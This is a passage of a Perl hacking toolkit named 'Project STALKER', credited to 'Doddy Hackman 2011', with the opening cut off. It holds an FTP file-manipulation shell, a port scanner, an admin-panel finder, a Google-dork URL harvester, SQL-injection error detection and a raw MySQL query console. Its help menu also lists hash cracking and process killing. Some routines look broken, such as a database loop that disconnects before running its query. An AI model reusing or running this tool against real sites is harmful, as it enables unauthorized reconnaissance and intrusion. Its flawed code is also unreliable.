del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? ); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}}} sub scanport { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Finish\n"; } sub scanpanel { print "[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; saveyes("logs/panel-logs.txt",$_[0]."/".$path); } } print "\n\n[+] Finish\n"; } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { push(@url,$l); } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { push(@founds,$2); } } my @founds = repes(@founds); return @founds; } sub sql { my ($pass1,$pass2) = ("+","--"); my $page = shift; if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; saveyes("logs/sql-logs.txt",$page); }} sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); return @links; sub agarrar { my ($a,%b) = @_; push(@links,values %b); } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } sub head { cprint "\x0311"; #13 print "\n\n-- == Project STALKER == --\n\n"; cprint "\x030"; } sub copyright { cprint "\x0311"; #13 print"\n\n(C) Doddy Hackman 2011\n\n"; cprint "\x030"; } sub toma { return $nave->get($_[0])->content; } sub tomax { return $nave->get($_[0]); } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } sub conectar { my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1], Proto => "tcp",Timeout => 5); print $sockex $_[2]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r\n"; } sub enter { my ($host,$user,$pass) = @_; print "[+] Connecting to the server\n"; $info = "dbi:mysql::".$host.":3306"; if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; chomp(my $ac = <stdin>); $enter->disconnect; print "\n\n[+] Closing connection\n\n"; last; } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { print $_."\t\t"; } print "\n\n"; while (@row = $re->fetchrow_array) { for(@row) { print $_."\t\t"; } print "\n"; }}}} } else { print "\n[-] Error connecting\n"; }} sub encode { my $string = $_[0]; $hex = '0x'; for (split //,$string) { $hex .= sprintf "%x", ord; } return $hex; } sub saveyes { open (SAVE,">>".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } sub helpme { cprint "\x0310"; #13 print qq( Commands : getip <host> getlink <page> getprocess killprocess <name process> <pid process> conec <host> <port> <command> allow <host> paths <page> encodehex <text> decodehex <text> encodeascii <text> decodeascii <text> encodebase <text> decodebase <text> scanport <host> panel <page> getpass <hash> kobra <page> ftp <host> <user> <pass> mysql <host> <user> <pass> navegator scangoogle help exit ); cprint "\x030"; } # # The End ? #